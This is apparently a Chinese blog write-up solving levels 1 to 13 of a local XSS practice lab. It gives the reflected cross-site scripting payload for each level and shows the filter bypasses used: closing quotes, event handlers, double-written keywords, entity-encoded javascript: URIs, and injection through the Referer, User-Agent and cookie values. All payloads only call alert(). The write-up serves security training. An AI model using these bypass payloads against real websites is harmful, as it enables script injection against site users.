xsschallenge靶场练习1-13关

文章目录

第一关

观察页面

php 复制代码
http://192.168.80.139/xsschallenge/level1.php?name=test

尝试在name=后面输入最近基本的xss语法

js 复制代码
<script>alert(1)</script>

第二关

查看页面源代码

可以通过构造闭合

js 复制代码
"> <script>alert(1)</script>

第三关

查看页面源代码

发现过滤了特殊字符

通过单引号闭合,使用触发事件来绕过

js 复制代码
' οnclick='alert(/xss/)

第四关

过滤了< >标签

可是试着尝试上一关的方法

js 复制代码
" οnclick="alert(1)

第五关

通过查看源码得知,替换了scriptscr_ipt

使用大写绕过,看看是否可行

js 复制代码
<SCRIPT>alert(10)</SCRIPT>

发现还是不行,后端把 我们输入的大写,替换成了小写

尝试其他方法绕过,使用伪协议

js 复制代码
"> <a href=javascript:alert(1)>demo</a>

第六关

输入<script>alert(1)</script>测试,查看源代码,依旧替换了script

js 复制代码
"><Img sRc=# OnErRoR=alert(/xss/);>

第七关

使用上一关的通过代码,发现把on给过滤掉 了,还把href给过滤了

我们可以尝试点击事件,双写on,来绕过

js 复制代码
" oonnclick=alert(1)//

第八关

在页面输入框中输入" onclick=alert(1)//

查看页面源代码,发现双引号被做了转义,只能通过其他方式去绕过

可以↓方式去绕过

js 复制代码
j&#9;avasc&#10;r&#13;ipt:alert(/xss/)

第九关

js 复制代码
j&#9;avasc&#10;r&#13;ipt:alert('http://')

第十关

没有输入框可以在地址栏中绕过

js 复制代码
192.168.80.139/xsschallenge/level10.php?keyword=<script>alert(1)</script>

页面没有反应,

查看页面源代码,发现三个隐藏起来的输入框

可以尝试使用t_link\t_history\t_sort这三个 挨个尝试

发现只有 在t_sort输入的时候,才有变化

js 复制代码
http://192.168.80.139/xsschallenge/level10.php?t_sort=<script>alert(1)</script>

构造其他方法

js 复制代码
" type="test" οnclick="alert(1)

第十一关

代码审计

php 复制代码
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

查看页面代码

发现t_refvalue值是第十关的 地址

js 复制代码
" type="button" οnclick="alert(1)

也可以使用bp抓取数据包修改Referer字段的值

第十二关

代码审计

php 复制代码
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
js 复制代码
" type="button" οnmοuseοver="alert(1)"

第十三关

代码审计

php 复制代码
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
php 复制代码
user=" type="button" οnmοuseοver="alert(1)"
相关推荐
枷锁—sha2 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1192 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20252 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec2 天前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用2 天前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~2 天前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian2 天前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
乾元2 天前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
Whoami!2 天前
⓫⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用Windows计划任务提权
网络安全·信息安全·利用windows计划任务提权
虚构之人3 天前
二进制漏洞挖掘(WinAFL Fuzzing)Windows篇
汇编·网络安全·信息安全·系统安全